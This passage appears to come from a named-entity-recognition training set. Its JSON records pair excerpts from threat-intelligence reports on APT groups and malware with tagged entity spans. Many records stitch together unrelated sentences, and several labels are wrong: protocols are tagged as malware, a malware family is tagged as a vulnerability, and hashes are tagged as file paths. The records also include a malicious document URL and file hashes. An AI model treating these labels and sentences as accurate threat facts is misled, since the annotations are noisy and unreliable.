investigation , we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations . 
The current Ke3chang campaign leverages the BS2005 malware , while older activity from 2010 - 2011 leveraged BMW , followed by the MyWeb malware sporadically used in between .", "spans": {"MALWARE: FakeSpy": [[25, 32]], "ORGANIZATION: we": [[147, 149]], "THREAT_ACTOR: attacker groups": [[191, 206]], "THREAT_ACTOR: FIN7": [[240, 244]], "MALWARE: BS2005": [[320, 326]], "MALWARE: malware": [[327, 334], [413, 420]], "MALWARE: BMW": [[385, 388]], "MALWARE: MyWeb": [[407, 412]]}, "info": {"id": "cyberner_stix_train_006243", "source": "cyberner_stix_train"}} {"text": "This means that all apps that were using this file will lose some functionality or even start crashing . Talos said the perpetrators of DNSpionage were able to steal email and other login credentials from a number of government and private sector entities in Lebanon and the United Arab Emirates by hijacking the DNS servers for these targets , so that all email and virtual private networking ( VPN ) traffic was redirected to an Internet address controlled by the attackers . RevengeHotels : 81701c891a1766c51c74bcfaf285854b . When loaded at system boot , the downloader uses a set of mathematical calculations to determine the computer - s unique fingerprint , and in turn uses this data to uniquely encrypt its communications later .", "spans": {"ORGANIZATION: Talos": [[105, 110]], "ORGANIZATION: government": [[217, 227]], "TOOL: VPN": [[396, 399]], "THREAT_ACTOR: RevengeHotels": [[478, 491]], "FILEPATH: 81701c891a1766c51c74bcfaf285854b": [[494, 526]]}, "info": {"id": "cyberner_stix_train_006244", "source": "cyberner_stix_train"}} {"text": "Suspect You ’ re Infected ? APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world . 
Once exploit has been achieved , Nidiran is delivered through a self-extracting executable that extracts the components to a .tmp folder after it has been executed .", "spans": {"THREAT_ACTOR: APT38": [[28, 33]], "THREAT_ACTOR: regime-backed group": [[74, 93]], "ORGANIZATION: financial institutions": [[149, 171]], "VULNERABILITY: exploit": [[210, 217]], "MALWARE: Nidiran": [[238, 245]], "MALWARE: self-extracting executable": [[269, 295]], "FILEPATH: .tmp": [[330, 334]]}, "info": {"id": "cyberner_stix_train_006245", "source": "cyberner_stix_train"}} {"text": "Over the past few years , we have seen a number of advanced threats and cybercrime groups who have stolen code-signing certificates .", "spans": {}, "info": {"id": "cyberner_stix_train_006246", "source": "cyberner_stix_train"}} {"text": "At this point the malware extracts and decrypts a stub DLL from its own resources ( ID 101 ) . The macro ran a PowerShell command that attempted to download additional PowerShell loader scripts for PupyRAT , a research and penetration-testing tool that has been used in attacks . Features : Do you have cyber security concerns about your business Contact CoreTech today , and we will conduct an IT security assessment .", "spans": {"TOOL: PowerShell command": [[111, 129]], "TOOL: PupyRAT": [[198, 205]], "TOOL: research and penetration-testing tool": [[210, 247]], "ORGANIZATION: CoreTech": [[355, 363]]}, "info": {"id": "cyberner_stix_train_006247", "source": "cyberner_stix_train"}} {"text": "The attackers have taken down their communication channels and are probably looking for ways to assemble their tools in a different manner . In late 2018 , the domain was associated with a different APT group / campaign of Chinese origin . 
The threat group is also known for its recent attack campaign against Bank and Retail business sectors , but the latest evidence indicates a potential expansion of its criminal operation to other industries too .", "spans": {"THREAT_ACTOR: APT group": [[199, 208]]}, "info": {"id": "cyberner_stix_train_006248", "source": "cyberner_stix_train"}} {"text": "X-Force IRIS Hosting URL : http://mol.com-ho.me/cv_itworx.doc .", "spans": {"URL: http://mol.com-ho.me/cv_itworx.doc": [[27, 61]]}, "info": {"id": "cyberner_stix_train_006249", "source": "cyberner_stix_train"}} {"text": "This IP address has been used to monitor open-source coverage of TRITON , heightening the probability of an interest by unknown subjects , originating from this network , in TEMP.Veles related activities .", "spans": {"MALWARE: TRITON": [[65, 71]], "THREAT_ACTOR: TEMP.Veles": [[174, 184]]}, "info": {"id": "cyberner_stix_train_006250", "source": "cyberner_stix_train"}} {"text": "Once opened , HenBox runs the following query to gather message information . HOMEUNIX , another popular backdoor used by APT41 , has been used by at least 14 separate Chinese espionage groups , including APT1 , APT10 , APT17 , APT18 , and APT20 . 
The Sofacy group created the Komplex Trojan to use in attack campaigns targeting the OS X operating system – a move that showcases their continued evolution toward multi-platform attacks .", "spans": {"MALWARE: HenBox": [[14, 20]], "TOOL: HOMEUNIX": [[78, 86]], "TOOL: backdoor": [[105, 113]], "THREAT_ACTOR: APT41": [[122, 127]], "THREAT_ACTOR: groups": [[186, 192]], "THREAT_ACTOR: APT1": [[205, 209]], "THREAT_ACTOR: APT10": [[212, 217]], "THREAT_ACTOR: APT17": [[220, 225]], "THREAT_ACTOR: APT18": [[228, 233]], "THREAT_ACTOR: APT20": [[240, 245]], "THREAT_ACTOR: Sofacy group": [[252, 264]], "MALWARE: Komplex Trojan": [[277, 291]]}, "info": {"id": "cyberner_stix_train_006251", "source": "cyberner_stix_train"}} {"text": "The following network traffic is performed by the Delphi sample which has the following metadata once unpacked by UPX :", "spans": {"TOOL: Delphi": [[50, 56]], "TOOL: UPX": [[114, 117]]}, "info": {"id": "cyberner_stix_train_006252", "source": "cyberner_stix_train"}} {"text": "Ordnance will be able to immediately generate shellcode after users provide the IP and Port that the shellcode should connect to or listen on . The banking malware GozNym has legs ; only a few weeks after the hybrid Trojan was discovered , it has reportedly spread into Europe and begun plaguing banking customers in Poland with redirection attacks .", "spans": {"MALWARE: Ordnance": [[0, 8]], "MALWARE: shellcode": [[101, 110]], "MALWARE: GozNym": [[164, 170]], "MALWARE: Trojan": [[216, 222]], "ORGANIZATION: banking customers": [[296, 313]]}, "info": {"id": "cyberner_stix_train_006253", "source": "cyberner_stix_train"}} {"text": "Here , the RAT stores all the captured videos in a “ video.3gp ” file . The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets . 
This group has become one of the most active threat actors , with noteworthy abilities , resources and infrastructure ; speculations indicate the hacking organization to be sponsored by the Iranian government . The code hunted for several security products to evade – including Kaspersky .", "spans": {"TOOL: LOWBALL": [[76, 83]], "THREAT_ACTOR: group": [[115, 120]], "TOOL: BUBBLEWRAP": [[178, 188]], "ORGANIZATION: Iranian government": [[476, 494]], "TOOL: Kaspersky": [[564, 573]]}, "info": {"id": "cyberner_stix_train_006254", "source": "cyberner_stix_train"}} {"text": "The CrowdStrike Falcon Intelligence team , which had been tracking Levashov as the adversary called ZOMBIE SPIDER , was able to help law enforcement seize control of the Kelihos botnet so that it could no longer be used by criminal actors . To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto .", "spans": {"ORGANIZATION: CrowdStrike Falcon Intelligence": [[4, 35]], "THREAT_ACTOR: ZOMBIE SPIDER": [[100, 113]], "MALWARE: Remote Desktop Protocol": [[298, 321]], "MALWARE: RDP": [[324, 327]], "MALWARE: Carbanak": [[332, 340]]}, "info": {"id": "cyberner_stix_train_006255", "source": "cyberner_stix_train"}} {"text": "However the Server handlers and command function are not , so we cannot create a completely perfect simulation .", "spans": {}, "info": {"id": "cyberner_stix_train_006256", "source": "cyberner_stix_train"}} {"text": "At this point , the attackers know the user has opened the document and send another spear-phishing email , this time containing an MS Word document with an embedded executable . 
Cadelle 's threats are capable of opening a back door and stealing information from victims' computers .", "spans": {"THREAT_ACTOR: attackers": [[20, 29]], "MALWARE: MS Word document": [[132, 148]]}, "info": {"id": "cyberner_stix_train_006258", "source": "cyberner_stix_train"}} {"text": "During one intrusion , it connected to multiple C2 domains on TCP port 80 , including mail . svrchost . com , using the following request .", "spans": {"TOOL: C2": [[48, 50]]}, "info": {"id": "cyberner_stix_train_006259", "source": "cyberner_stix_train"}} {"text": "Bookworm has little malicious functionality built-in , with its only core ability involving stealing keystrokes and clipboard contents . Through an IP address whitelisting process , the threat group selectively targets visitors to these websites .", "spans": {"TOOL: Bookworm": [[0, 8]]}, "info": {"id": "cyberner_stix_train_006260", "source": "cyberner_stix_train"}} {"text": "Currently , all bespoke apps have been taken down from the Google Play store . Hackers target primarily companies in Russia and CIS countries , though it is noticed that the amount of attacks targeting the USA has increased 5 times since 2011 . These groups use a lot of social engineering in their attacks , asking for a quote from what appears to be a government entity or private company wanting to make a reservation for a large number of people . The U.S. Cybersecurity and Infrastructure Security Agency ( CISA ) released a detailed timeline on the campaign , stating that an investigation from Microsoft revealed that “ advanced persistent threat ( APT ) actors accessed and exfiltrated unclassified Exchange Online Outlook data ” after users reported suspicious activities in their Microsoft 365 cloud environment .", "spans": {"SYSTEM: Google Play": [[59, 70]], "ORGANIZATION: primarily companies": [[94, 113]], "ORGANIZATION: U.S. 
Cybersecurity and Infrastructure Security Agency ( CISA )": [[456, 518]], "ORGANIZATION: Microsoft": [[601, 610]], "THREAT_ACTOR: advanced persistent threat ( APT ) actors": [[627, 668]], "SYSTEM: Microsoft 365 cloud environment": [[790, 821]]}, "info": {"id": "cyberner_stix_train_006261", "source": "cyberner_stix_train"}} {"text": "a command from the C & C server . This coupled with the timing of operations – which coincides with Iranian working hours – and the use of multiple Iranian hacker tools and name servers bolsters our assessment that APT33 may have operated on behalf of the Iranian government . However, we think it’s worth mentioning that for one victim we found a correlation between the execution of Remexi´s main module and the execution of an AutoIt script compiled as PE , which we believe may have dropped the . The hijacking is achieved by adding the threat actor 's e - mail address to the Facebook Business account with Admin and Finance editor roles .", "spans": {"TOOL: name servers": [[173, 185]], "THREAT_ACTOR: APT33": [[215, 220]], "TOOL: AutoIt": [[430, 436]], "TOOL: PE": [[456, 458]]}, "info": {"id": "cyberner_stix_train_006262", "source": "cyberner_stix_train"}} {"text": "THREAT ANALYSIS Infection Vector : Smishing Your Device Thus far , FakeSpy campaigns are characterized by SMS phishing ( a.k.a . Our research found that APT33 , or a closely aligned threat actor , continues to conduct and prepare for widespread cyberespionage activity , with over 1 , 200 domains used since March 28 , 2019 and with a strong emphasis on using commodity malware . 
In 2015 , Kaspersky Lab researchers conducted Incident Response for 29 organizations located in Russia and infected by these three groups .", "spans": {"MALWARE: FakeSpy": [[67, 74]], "THREAT_ACTOR: APT33": [[153, 158]], "ORGANIZATION: Kaspersky Lab": [[390, 403]], "THREAT_ACTOR: groups": [[511, 517]]}, "info": {"id": "cyberner_stix_train_006263", "source": "cyberner_stix_train"}} {"text": "Upon adding a network drive , the hook calls its “ RecordToFile ” file stealer method .", "spans": {}, "info": {"id": "cyberner_stix_train_006264", "source": "cyberner_stix_train"}} {"text": "To communicate with the C2 server , the Trojan will send emails to specific email addresses via SMTPS over TCP port 587 .", "spans": {"TOOL: C2": [[24, 26]], "MALWARE: Trojan": [[40, 46]], "TOOL: emails": [[57, 63]], "TOOL: email": [[76, 81]]}, "info": {"id": "cyberner_stix_train_006265", "source": "cyberner_stix_train"}} {"text": "Split of exfiltrated data Some noteworthy files identified in content taken from compromised devices include passport photos , audio recordings of calls , other images , and a PDF document with data on 484 individuals . The authors of that report identify three primary tools used in the campaigns attributed to Hidden Lynx : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit . Although they control systems in dozens of countries , their attacks originate from four large networks in Shanghai — two of which are allocated directly to the Pudong New Area , the home of Unit 61398 . 
Recently , this model for threat actors has come to be known as the “ as - a - service \" model , borrowing the term from the growing trend in the tech industry .", "spans": {"TOOL: Trojan.Naid": [[326, 337]], "MALWARE: Backdoor.Moudoor": [[340, 356]], "TOOL: Backdoor.Hikit": [[363, 377]], "ORGANIZATION: Unit 61398": [[571, 581]], "THREAT_ACTOR: threat actors": [[610, 623]]}, "info": {"id": "cyberner_stix_train_006266", "source": "cyberner_stix_train"}} {"text": "According to a now-defunct social media profile , the same individual was a professor at CNIIHM , which is located near Nagatinskaya Street in the Nagatino-Sadovniki district of Moscow .", "spans": {"ORGANIZATION: CNIIHM": [[89, 95]]}, "info": {"id": "cyberner_stix_train_006267", "source": "cyberner_stix_train"}} {"text": "A Mac version of the Trojan also exists ( OSX.Sofacy ) .", "spans": {"SYSTEM: Mac": [[2, 5]], "MALWARE: Trojan": [[21, 27]], "FILEPATH: OSX.Sofacy": [[42, 52]]}, "info": {"id": "cyberner_stix_train_006268", "source": "cyberner_stix_train"}} {"text": "We are aware of one case where Scarlet Mimic broke from the spear-phishing pattern described above . 360 and Tuisec already identified some Gorgon Group members .", "spans": {"THREAT_ACTOR: Scarlet Mimic": [[31, 44]], "ORGANIZATION: 360": [[101, 104]], "ORGANIZATION: Tuisec": [[109, 115]], "THREAT_ACTOR: Gorgon Group": [[140, 152]], "ORGANIZATION: members": [[153, 160]]}, "info": {"id": "cyberner_stix_train_006269", "source": "cyberner_stix_train"}} {"text": "This leads us to believe this is another actor . In April Novetta released its excellent report on the Winnti malware spotted in the operations of Axiom group . A handle to the DLL file is taken in order to make its deletion more difficult . 
None Read about adversaries tracked by CrowdStrike in 2021 in the and in the • None Learn more about how can help your organization prepare to defend against sophisticated threats , respond and recover from incidents with speed and precision , and fortify your cybersecurity practices .", "spans": {"ORGANIZATION: Novetta": [[58, 65]], "TOOL: Winnti malware": [[103, 117]], "TOOL: DLL": [[177, 180]], "ORGANIZATION: CrowdStrike": [[281, 292]]}, "info": {"id": "cyberner_stix_train_006270", "source": "cyberner_stix_train"}} {"text": "System application installed by mcpef.apk . To deliver the malware to the victim machines , the Rocke group exploits vulnerabilities in Apache Struts 2 , Oracle WebLogic , and Adobe ColdFusion . Like the Moafee group , we observed DragonOK running HTRAN to proxy their C2 servers , which are also operated on CHINANET but are hosted in the Jiangsu Province .", "spans": {"VULNERABILITY: Rocke group exploits vulnerabilities": [[96, 132]], "THREAT_ACTOR: Moafee group": [[204, 216]], "THREAT_ACTOR: DragonOK": [[231, 239]], "MALWARE: HTRAN": [[248, 253]], "TOOL: C2": [[269, 271]]}, "info": {"id": "cyberner_stix_train_006271", "source": "cyberner_stix_train"}} {"text": "Sample 1 marks the first HenBox sample we saw embedding a legitimate app within its assets to be dropped and installed on the victim device as a decoy . From the time of file creation , the attacker started working at least as early as July 2018 . 
FireEye has monitored APT17 's use of BLACKCOFFEE variants since 2013 to masquerade malicious communication as normal web traffic by disguising the CnC communication as queries to web search engines .", "spans": {"MALWARE: HenBox": [[25, 31]], "THREAT_ACTOR: attacker": [[190, 198]], "ORGANIZATION: FireEye": [[248, 255]], "THREAT_ACTOR: APT17": [[270, 275]], "MALWARE: BLACKCOFFEE": [[286, 297]]}, "info": {"id": "cyberner_stix_train_006273", "source": "cyberner_stix_train"}} {"text": "Indeed , the Trojan explicitly targets Russian-speaking users . The first of which we call ' CONFUCIUS_A ' , a malware family that has links to a series of attacks associated with a backdoor attack method commonly known as SNEEPY ( aka ByeByeShell ) first reported by Rapid7 in 2013 . The actor has conducted operations since at least 2013 in support of China 's naval modernization effort .", "spans": {"MALWARE: CONFUCIUS_A": [[93, 104]], "TOOL: SNEEPY": [[223, 229]], "TOOL: ByeByeShell": [[236, 247]], "ORGANIZATION: Rapid7": [[268, 274]], "THREAT_ACTOR: actor": [[289, 294]]}, "info": {"id": "cyberner_stix_train_006274", "source": "cyberner_stix_train"}} {"text": "Unlike previous campaigns from this actor , the flyer does not contain an Office exploit or a 0-day , it simply contains a malicious Visual Basic for Applications ( VBA ) macro .", "spans": {"TOOL: Visual Basic for Applications": [[133, 162]], "TOOL: VBA": [[165, 168]]}, "info": {"id": "cyberner_stix_train_006275", "source": "cyberner_stix_train"}} {"text": "REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japanese organizations such as government agencies ( including defense ) as well as those in biotechnology , electronics manufacturing , and industrial chemistry . 
One e-mail carried a Microsoft PowerPoint file named \" thanks.pps \" ( VirusTotal ) , the other a Microsoft Word document named \" request.docx \" .", "spans": {"THREAT_ACTOR: REDBALDKNIGHT": [[0, 13]], "THREAT_ACTOR: BRONZE BUTLER": [[30, 43]], "THREAT_ACTOR: Tick": [[48, 52]], "THREAT_ACTOR: cyberespionage group": [[60, 80]], "ORGANIZATION: government agencies": [[128, 147]], "ORGANIZATION: defense": [[160, 167]], "ORGANIZATION: biotechnology": [[190, 203]], "ORGANIZATION: electronics manufacturing": [[206, 231]], "ORGANIZATION: industrial chemistry": [[238, 258]], "TOOL: e-mail": [[265, 271]], "TOOL: Microsoft PowerPoint": [[282, 302]], "FILEPATH: thanks.pps": [[316, 326]], "TOOL: VirusTotal": [[331, 341]], "TOOL: Microsoft Word": [[358, 372]], "FILEPATH: request.docx": [[390, 402]]}, "info": {"id": "cyberner_stix_train_006276", "source": "cyberner_stix_train"}} {"text": "Backdoor.Zekapab is installed on selected infected computers and is capable of taking screenshots , executing files and commands , uploading and downloading files , performing registry and file system operations , and carrying out system information tasks .", "spans": {"FILEPATH: Backdoor.Zekapab": [[0, 16]]}, "info": {"id": "cyberner_stix_train_006277", "source": "cyberner_stix_train"}} {"text": "The malware uses HTTP for communication with the C2 server for command handling and data exfiltration . ined in the archive is called DriverInstallerU.exe but its metadata shows that its original name is Interenet Assistant.exe . 
The ScarCruft group keeps expanding its Exfiltration targets to steal further information from infected hosts and continues to create tools for additional data Exfiltration .", "spans": {"MALWARE: DriverInstallerU.exe": [[134, 154]], "MALWARE: Interenet Assistant.exe": [[204, 227]], "THREAT_ACTOR: ScarCruft": [[234, 243]]}, "info": {"id": "cyberner_stix_train_006278", "source": "cyberner_stix_train"}} {"text": "From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space . By looking at our telemetry , we found evidence that Turla installers were exfiltrating information to get.adobe.com URLs since at least July 2016 .", "spans": {"VULNERABILITY: Carbanak": [[10, 18]], "ORGANIZATION: banks": [[55, 60]], "ORGANIZATION: electronic payment": [[65, 83]], "ORGANIZATION: space": [[125, 130]], "THREAT_ACTOR: Turla": [[186, 191]]}, "info": {"id": "cyberner_stix_train_006279", "source": "cyberner_stix_train"}} {"text": "Code snippets showing how GolfSpy monitors phone calls via register receiver ( top left ) , its actions when the device is woken up ( top right ) , and how it encrypts the stolen data ( bottom ) The malware retrieves commands from the C & C server via HTTP , and attackers can steal specific files on the infected device . It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes . The script executes an open-source .NET class used for taking a screenshot . 
When an attacker pays for an as - a - service malware , they often get an individual login with dedicated customer support , much like any user would with a legitimate piece of software .", "spans": {"MALWARE: GolfSpy": [[26, 33]], "THREAT_ACTOR: ScarCruft": [[334, 343]], "ORGANIZATION: intelligence": [[367, 379]], "ORGANIZATION: political": [[384, 393]], "ORGANIZATION: diplomatic": [[398, 408]], "FILEPATH: .NET": [[455, 459]], "THREAT_ACTOR: attacker": [[505, 513]], "MALWARE: as - a - service malware": [[526, 550]]}, "info": {"id": "cyberner_stix_train_006280", "source": "cyberner_stix_train"}} {"text": "A charge is then added to the user ’ s bill with their mobile service provider . The cyber-espionage campaign has labelled the group Advanced Persistent Threat ( APT ) 40 or , titled , Periscope . SysInfo Get target System information . We were able to find additional links between Hack520 ’s “ Pig network ” and the Winnti group ’s activities .", "spans": {"THREAT_ACTOR: Advanced Persistent": [[133, 152]], "THREAT_ACTOR: Threat ( APT ) 40": [[153, 170]], "THREAT_ACTOR: Periscope": [[185, 194]], "THREAT_ACTOR: Winnti group": [[318, 330]]}, "info": {"id": "cyberner_stix_train_006281", "source": "cyberner_stix_train"}} {"text": "Interestingly , the embedded app in sample 2 is not a version of the Android Settings app but instead the “ Amaq Agency ” app , which reports on ISIS related news . APT41 has executed multiple software supply chain compromises , gaining access to software companies to inject malicious code into legitimate files before distributing updates . 
APT19 seemed to be going after defense sector firms , Chinese dissident groups and political , financial , pharmaceutical and energy sectors that could benefit the Chinese economy .", "spans": {"SYSTEM: Android Settings": [[69, 85]], "SYSTEM: Amaq Agency": [[108, 119]], "THREAT_ACTOR: APT41": [[165, 170]], "THREAT_ACTOR: APT19": [[343, 348]], "ORGANIZATION: defense sector firms": [[374, 394]], "ORGANIZATION: political": [[426, 435]], "ORGANIZATION: financial": [[438, 447]], "ORGANIZATION: pharmaceutical": [[450, 464]], "ORGANIZATION: energy sectors": [[469, 483]]}, "info": {"id": "cyberner_stix_train_006282", "source": "cyberner_stix_train"}} {"text": "Succeeding monitoring efforts revealed a newer variant that exploits the social media platforms Instagram and Tumblr instead of Twitter to hide its C & C address . FireEye has monitored APT17 's use of BLACKCOFFEE variants since 2013 to masquerade malicious communication as normal web traffic by disguising the CnC communication as queries to web search engines . Glimpse can be set to use ping mode in several ways while performing receive operations . An exhaustive analysis of domains registered to the various Vistomail pseudonyms used by Harrison shows he also ran Bash - a - Business[.]com , which Harrison dedicated to “ all those sorry ass corporate executives out there profiting from your hard work , organs , lives , ideas , intelligence , and wallets . ”", "spans": {"ORGANIZATION: Instagram": [[96, 105]], "ORGANIZATION: Tumblr": [[110, 116]], "ORGANIZATION: Twitter": [[128, 135]], "ORGANIZATION: FireEye": [[164, 171]], "THREAT_ACTOR: APT17": [[186, 191]], "TOOL: BLACKCOFFEE": [[202, 213]], "MALWARE: Glimpse": [[365, 372]]}, "info": {"id": "cyberner_stix_train_006283", "source": "cyberner_stix_train"}} {"text": "C & C communications The default C & C address is hardwired in the Rotexy code : The relative address to which the Trojan will send information from the device is generated in a pseudo-random manner . 
Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload . Last week Microsoft , working together with Facebook and others in the security community , took strong steps to protect our customers and the internet from ongoing attacks by an advanced persistent threat actor known to us as ZINC , also known as the Lazarus Group .", "spans": {"MALWARE: Rotexy": [[67, 73]], "MALWARE: Microsoft Word document": [[261, 284]], "ORGANIZATION: Microsoft": [[414, 423]], "ORGANIZATION: Facebook": [[448, 456]], "ORGANIZATION: security community": [[475, 493]], "THREAT_ACTOR: ZINC": [[631, 635]], "THREAT_ACTOR: Lazarus Group": [[656, 669]]}, "info": {"id": "cyberner_stix_train_006284", "source": "cyberner_stix_train"}} {"text": "If Adobe Flash or Microsoft Silverlight is no longer required , DHS recommends that those applications be removed from systems .", "spans": {"ORGANIZATION: Adobe": [[3, 8]], "TOOL: Flash": [[9, 14]], "ORGANIZATION: Microsoft": [[18, 27]], "TOOL: Silverlight": [[28, 39]], "ORGANIZATION: DHS": [[64, 67]]}, "info": {"id": "cyberner_stix_train_006285", "source": "cyberner_stix_train"}} {"text": "Verify Apps : Ensure Verify Apps is enabled . Active since at least 2014 , this actor has long-standing interest in maritime industries , naval defense contractors , and associated research institutions in the United States and Western Europe . The actual malicious payload is quite small and only contains about 17 KB of code and data . 
Mandiant identified a second sample on VirusTotal with the same self - signed certificate CN .", "spans": {"THREAT_ACTOR: actor": [[80, 85]], "ORGANIZATION: maritime industries": [[116, 135]], "ORGANIZATION: naval defense contractors": [[138, 163]], "ORGANIZATION: research institutions": [[181, 202]], "TOOL: VirusTotal": [[377, 387]]}, "info": {"id": "cyberner_stix_train_006286", "source": "cyberner_stix_train"}} {"text": "When this request completes , the event listener will call the ‘ onload3 ’ function .", "spans": {}, "info": {"id": "cyberner_stix_train_006287", "source": "cyberner_stix_train"}} {"text": "XLoader as Spyware and Banking Trojan XLoader can also collect information related to usage of apps installed in the device . SPLM , GAMEFISH , and Zebrocy delivery all maintain their own clusters , but frequently overlap later . Analyzing it in depth , we discover it actually is the RMS ( Remote Manipulator System ) client by TektonIT , encrypted using the MPress PE compressor utility , a legitimate tool , to avoid antivirus detection .", "spans": {"MALWARE: XLoader": [[0, 7]], "THREAT_ACTOR: SPLM": [[126, 130]], "THREAT_ACTOR: GAMEFISH": [[133, 141]], "THREAT_ACTOR: Zebrocy": [[148, 155]], "TOOL: RMS": [[285, 288]], "TOOL: Remote Manipulator System": [[291, 316]], "TOOL: TektonIT": [[329, 337]], "TOOL: MPress PE": [[360, 369]]}, "info": {"id": "cyberner_stix_train_006288", "source": "cyberner_stix_train"}} {"text": "It is unclear if the remote server is capable of solving the CAPTCHA image automatically or if this is done manually by a human in the background . While the attackers used different pretexts when sending these malicious emails , two methodologies stood out . Few security companies have publicly discussed this tactic . ItaDuke because it reminded us of Duqu and because of the ancient Italian comments in the shellcode copied from Dante Alighieri - s ? 
Divine Comedy .", "spans": {"MALWARE: ItaDuke": [[321, 328]], "MALWARE: Duqu": [[355, 359]], "ORGANIZATION: Dante Alighieri": [[433, 448]], "ORGANIZATION: Divine Comedy": [[455, 468]]}, "info": {"id": "cyberner_stix_train_006289", "source": "cyberner_stix_train"}} {"text": "It specifically targets financial banking applications across the United States and Europe , including Italy , the UK , Spain , Switzerland , France , and Germany . Contextually relevant emails are sent to specific targets with attached documents that are packed with exploit code and Trojan horse programmes designed to take advantage of vulnerabilities in software installed on the target 's computer . APT40 has been observed leveraging a variety of techniques for initial compromise , including web server exploitation , phishing campaigns delivering publicly available and custom backdoors , and strategic web compromises .", "spans": {"MALWARE: documents": [[237, 246]], "THREAT_ACTOR: APT40": [[405, 410]]}, "info": {"id": "cyberner_stix_train_006290", "source": "cyberner_stix_train"}} {"text": "Until now , Android malware that wanted advanced capabilities typically had to trick users into approving sometimes scary-sounding permissions or exploit rooting vulnerabilities . Loaders are typically responsible for loading a DLL component into memory given that a DLL cannot operate in a standalone mode such as an executable . 
These include : This article provides an overview of the Iranian cyber threat landscape , including the history of Iranian cyber strategy , the most recent news regarding its attack campaigns , and descriptions of major Iranian cyber threat groups .", "spans": {"SYSTEM: Android": [[12, 19]], "ORGANIZATION: Iranian": [[388, 395], [446, 453]], "THREAT_ACTOR: Iranian cyber threat groups": [[551, 578]]}, "info": {"id": "cyberner_stix_train_006291", "source": "cyberner_stix_train"}} {"text": "The sample ’ s first appearance seems to be May 15 , 2018 , when it was uploaded to VirusTotal , but it ’ s unclear how the tainted sample is disseminated . They are one of the most active cyber crime groups in 2019 , and they often modify and tweak their hacking methods and perform periodic hacking activities . FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015 .", "spans": {"ORGANIZATION: VirusTotal": [[84, 94]], "THREAT_ACTOR: groups": [[201, 207]], "THREAT_ACTOR: FIN7": [[314, 318]]}, "info": {"id": "cyberner_stix_train_006292", "source": "cyberner_stix_train"}} {"text": "If opened , the dropper runs a loader known as Trojan.Vcrodat on the computer . FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017 .", "spans": {"TOOL: dropper": [[16, 23]], "TOOL: Trojan.Vcrodat": [[47, 61]], "ORGANIZATION: FireEye": [[80, 87]], "VULNERABILITY: CVE-2017-10271": [[159, 173]]}, "info": {"id": "cyberner_stix_train_006293", "source": "cyberner_stix_train"}} {"text": "The only good way to fight all these threats is to be proactive , and so a good security solution is a must . Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . 
The OilRig group ( AKA APT34 , Helix Kitten ) is an adversary motivated by espionage primarily operating in the Middle East region .", "spans": {"ORGANIZATION: Anomali": [[110, 117]], "MALWARE: ITW": [[196, 199]], "VULNERABILITY: CVE-2018-0798": [[227, 240]], "THREAT_ACTOR: OilRig group": [[247, 259]], "THREAT_ACTOR: APT34": [[266, 271]], "THREAT_ACTOR: Helix Kitten": [[274, 286]]}, "info": {"id": "cyberner_stix_train_006294", "source": "cyberner_stix_train"}} {"text": "This action changes the original file size of the DEX file , which makes the malicious resources a part of the DEX file , a section that is ignored by the signature validation process . At that time it was the name of a cybercriminal group that was stealing money from Russian financial establishments — to the tune of at least $150,000 per hit . Along with the password , the malware ’s authors also include a clean version of unzIP . 2023 - 07 - 19 Update : On June 5 , @SecurityAura described an unknown campaign using .hta payloads disguised as driver updates .", "spans": {"ORGANIZATION: financial establishments": [[277, 301]], "TOOL: unzIP": [[428, 433]], "ORGANIZATION: @SecurityAura": [[472, 485]]}, "info": {"id": "cyberner_stix_train_006295", "source": "cyberner_stix_train"}} {"text": "The Dukes are known to employ a vast arsenal of malware toolsets , which we identify as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , CloudDuke , SeaDuke , HammerDuke , PinchDuke , and GeminiDuke .", "spans": {"THREAT_ACTOR: Dukes": [[4, 9]], "MALWARE: MiniDuke": [[88, 96]], "MALWARE: CosmicDuke": [[99, 109]], "MALWARE: OnionDuke": [[112, 121]], "MALWARE: CozyDuke": [[124, 132]], "MALWARE: CloudDuke": [[135, 144]], "MALWARE: SeaDuke": [[147, 154]], "MALWARE: HammerDuke": [[157, 167]], "MALWARE: PinchDuke": [[170, 179]], "MALWARE: GeminiDuke": [[186, 196]]}, "info": {"id": "cyberner_stix_train_006296", "source": "cyberner_stix_train"}} {"text": "AndroidOS_ProjectSpy.HRX 
3a15e7b8f4e35e006329811a6a2bf291d449884a120332f24c7e3ca58d0fbbdb IOS_ProjectSpy.A URLs cashnow [ . APT38 has paralleled North Korea 's worsening financial condition . An entropy threshold adjustment due to check in high maturity level . Knowing what motivates hackers is a key part of keeping them out of your business", "spans": {"THREAT_ACTOR: APT38": [[124, 129]]}, "info": {"id": "cyberner_stix_train_006297", "source": "cyberner_stix_train"}} {"text": "It was one of the few ransomware strains that were being mass-distributed via email spam and exploit kits , but also as part of targeted attacks against high-profile organizations ( a tactic known as big-game hunting ) at the same time . The Sima group also engaged in impersonation of Citizenship and Immigration Services at the Department of Homeland Security , posing as a notice about the expiration of the recipient 's Permanent Residence status .", "spans": {"ORGANIZATION: high-profile organizations": [[153, 179]], "THREAT_ACTOR: Sima": [[242, 246]], "ORGANIZATION: Citizenship": [[286, 297]], "ORGANIZATION: Immigration Services": [[302, 322]], "ORGANIZATION: Department of Homeland Security": [[330, 361]]}, "info": {"id": "cyberner_stix_train_006298", "source": "cyberner_stix_train"}} {"text": "One of the packages after initial launch The iOS variant is not as sophisticated as the Android version , and contained a subset of the functionality the Android releases offered . The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign . 
